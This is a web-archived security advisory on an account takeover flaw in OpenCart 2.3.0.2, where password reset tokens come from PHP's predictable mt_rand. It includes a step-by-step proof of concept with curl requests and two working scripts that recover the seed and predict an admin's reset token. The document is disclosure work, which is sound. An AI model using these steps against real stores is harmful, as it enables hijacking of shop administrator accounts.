{"id":7117,"date":"2017-03-26T14:19:22","date_gmt":"2017-03-26T22:19:22","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/26\/news-908\/"},"modified":"2017-03-26T14:19:22","modified_gmt":"2017-03-26T22:19:22","slug":"news-908","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/03\/26\/news-908\/","title":{"rendered":"SSD Advisory \u2013 OpenCart Account Takeover"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz | Date: Sun, 26 Mar 2017 13:14:58 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><\/p>\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an account takeover vulnerability found in OpenCart (version 2.3.0.2). OpenCart is an open-source e-commerce platform written in PHP. 
<\/p>\n<p>&#8220;Opencart is an easy-to-use, powerful, Open Source online store management program that can manage multiple online stores from a single back-end.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher &#8220;Ayrx&#8221; has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> The vendor had this response to our report:<br \/> &#8220;&#8230; another clown acting like james bond with a nonsense Vulnerability&#8221;<br \/> &#8220;james already told me it was bullshit so go ahead!&#8221;<\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>OpenCart versions 2.1.0.0 up to the latest release, 2.3.0.2, contain a token() function that generates tokens using PHP&#8217;s mt_rand function:<\/p>\n<div id=\"crayon-58d83e6967014166836564\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">function token($length = 32) {\n\t\/\/ Create random token\n\t$string = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';\n\n\t$max = strlen($string) - 1;\n\n\t$token = '';\n\n\tfor ($i = 0; $i &lt; $length; $i++) {\n\t\t$token .= $string[mt_rand(0, $max)];\n\t}\n\n\treturn $token;\n}<\/textarea><\/div>\n<\/div>\n<p>PHP&#8217;s <em>mt_rand<\/em> function is based on the <em>Mersenne Twister PRNG<\/em>, which is not cryptographically strong and easily exploitable.<\/p>\n<p>In particular, the <em>token()<\/em> function is used in generating password reset tokens, which leads to an account takeover vulnerability.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The described proof of concept requires OpenCart running on a fresh PHP process. This is because PHP&#8217;s <em>mt_rand<\/em> is seeded once on process start.<\/p>\n<p>The scripts used are in the Exploit Scripts section of the report.<\/p>\n<p><u>Initial setup:<\/u><\/p>\n<ol>\n<li>Download OpenCart v2.3.0.2 from <a href=\"https:\/\/github.com\/opencart\/opencart\/archive\/2.3.0.2.tar.gz\" target=\"_blank\">here<\/a><\/li>\n<li>Extract the files and rename <em>config-dist.php<\/em> and <em>admin\/config-dist.php<\/em> to <em>config.php<\/em> and <em>admin\/config.php<\/em><\/li>\n<li>Run the command &#8220;<em>php -S 0.0.0.0:8000<\/em>&#8221; from the <em>upload\/<\/em> folder<\/li>\n<li>Continue the installation through the web interface (<em>127.0.0.1:8000<\/em>, for example), following the installation <a href=\"http:\/\/docs.opencart.com\/installation\/\" target=\"_blank\">guide<\/a><\/li>\n<li>Register an account that belongs to the &#8220;attacker&#8221;. In this Proof of Concept the attacker uses the email <em>foo@abc.com<\/em>, while <em>admin@abc.com<\/em> belongs to the account you want to take over<\/li>\n<\/ol>\n<p><u>Attack:<\/u><\/p>\n<ol>\n<li><a href=\"http:\/\/www.openwall.com\/php_mt_seed\/\" target=\"_blank\">Download<\/a> and compile <em>php_mt_seed<\/em> v3.2.
<\/li>\n<li>Send a password reset request for the <strong>attacker<\/strong>-controlled email account\n<div id=\"crayon-58d83e6967024574085921\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">curl -X POST -F \"email=foo@abc.com\" localhost:8000\/index.php?route=account\/forgotten<\/textarea><\/div>\n<\/div>\n<\/li>\n<li>Send a password reset request for the account you want to take over\n<div id=\"crayon-58d83e696702a357205067\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">curl -X POST -F \"email=admin@abc.com\" localhost:8000\/admin\/index.php?route=common\/forgotten<\/textarea><\/div>\n<\/div>\n<\/li>\n<li>Find the password reset token sent to <em>foo@abc.com<\/em><\/li>\n<li>Run <em>python <a href=\"#Convert_token.py\">Convert_token.py<\/a> TOKEN<\/em><\/li>\n<li>Run <em>.\/php_mt_seed<\/em> with the output of <em>Convert_token.py<\/em><\/li>\n<li>Edit the <em>$seed<\/em> variable in <em>Generate.php<\/em> with the seed discovered by <em>php_mt_seed<\/em><\/li>\n<li>Run the command &#8220;<em>php Generate.php<\/em>&#8221; to discover the password reset token of admin@abc.com<\/li>\n<li>Go to &#8220;<em>localhost:8000\/admin\/index.php?route=common\/reset&#038;code=CODE<\/em>&#8221; with CODE replaced by the output of <em>Generate.php<\/em><\/li>\n<li>We have now taken over the admin account by resetting the password!<\/li>\n<\/ol>\n<p>Once again, this Proof of Concept requires the password reset requests to be processed by a fresh PHP process (or a PHP process that has not called <em>mt_rand<\/em> before).<\/p>\n<p><a name=\"Convert_token.py\"><\/a><\/p>\n<p><strong>Exploit Scripts<\/strong><\/p>\n<p><u>Convert_token.py<\/u><\/p>\n<div id=\"crayon-58d83e6967031653553671\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">import sys\n\nCHAR = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\"\n\n\ndef find_char(char):\n    # Position of the character in the alphabet used by token(), i.e. the\n    # exact mt_rand(0, 61) output that produced it\n    for pos, val in enumerate(CHAR):\n        if val == char:\n            return pos\n\n\ndef main():\n    token = sys.argv[1]\n    out = \"\"\n\n    # One \"min max range_min range_max\" quadruple per token character,\n    # in the format php_mt_seed expects on its command line\n    for i in token:\n        leak = str(find_char(i))\n        out += leak\n        out += \" \"\n        out += leak\n        out += \" \"\n        out += \"0\"\n        out += \" \"\n        out += \"61\"\n        out += \" \"\n\n    print(out)\n\n\nif __name__ == \"__main__\":\n    main()<\/textarea><\/div>\n<\/div>\n<p><u>Generate.php<\/u><\/p>\n<div id=\"crayon-58d83e6967037080544418\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">&lt;?php\n\/\/ Seed recovered by php_mt_seed from the attacker's own reset token\n$seed = 2934787735;\nmt_srand($seed);\n\n$string = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';\n$max = strlen($string) - 1;\n\n\/\/ Discard the 40 outputs consumed by the first (attacker) reset request\nfor ($i = 0; $i &lt; 40; $i++) {\n\t$string[mt_rand(0, $max)];\n}\n\n\/\/ The next 40 outputs form the token issued for the second (victim) request\n$token = '';\nfor ($i = 0; $i &lt; 40; $i++) {\n\t$token .= $string[mt_rand(0, $max)];\n}\n\necho $token;\n?&gt;<\/textarea><\/div>\n<\/div>
<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-13\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">40<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">$token<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$string<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">mt_rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$max<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-15\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-17\"><span 
class=\"crayon-k\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$token<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-18\"><span class=\"crayon-ta\">?&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0085 seconds] -->  <\/p>\n<p><strong>Untwister<\/strong><br \/> When OpenCart has been running for some time, the token generated by it would need more than just one token to be deduced (allowing you to know the next token that is generated). To make life easier a tool called <a href=\"https:\/\/github.com\/altf4\/untwister\" target=\"_blank\">Untwister<\/a> has been built. Using the Untwister an attacker can use multiple tokens he has recovered to predict the next tokens that will be generated by OpenCart.<\/p>\n<p>More details on Untwister can be found here: <a href=\"https:\/\/www.bishopfox.com\/blog\/2014\/08\/untwisting-mersenne-twister-killed-prng\/\" target=\"_blank\">https:\/\/www.bishopfox.com\/blog\/2014\/08\/untwisting-mersenne-twister-killed-prng\/<\/a>.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3022\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Sun, 26 Mar 2017 13:14:58 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a account takeover vulnerability found in OpenCart (version 2.3.0.2). OpenCart is a opensource e-commerce platform written in PHP. 
&#8220;Opencart is an easy to-use, powerful, Open Source online store management program that can manage multiple online stores from a single back-end.&#8221; Credit An independent security researcher &#8220;Ayrx&#8221; has reported this &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3022\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 OpenCart Account Takeover<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11741,10757],"class_list":["post-7117","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-insecure-randomness","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7117"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7117\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7117"}],"curies":[{"name":"wp","href":"https:
\/\/api.w.org\/{rel}","templated":true}]}}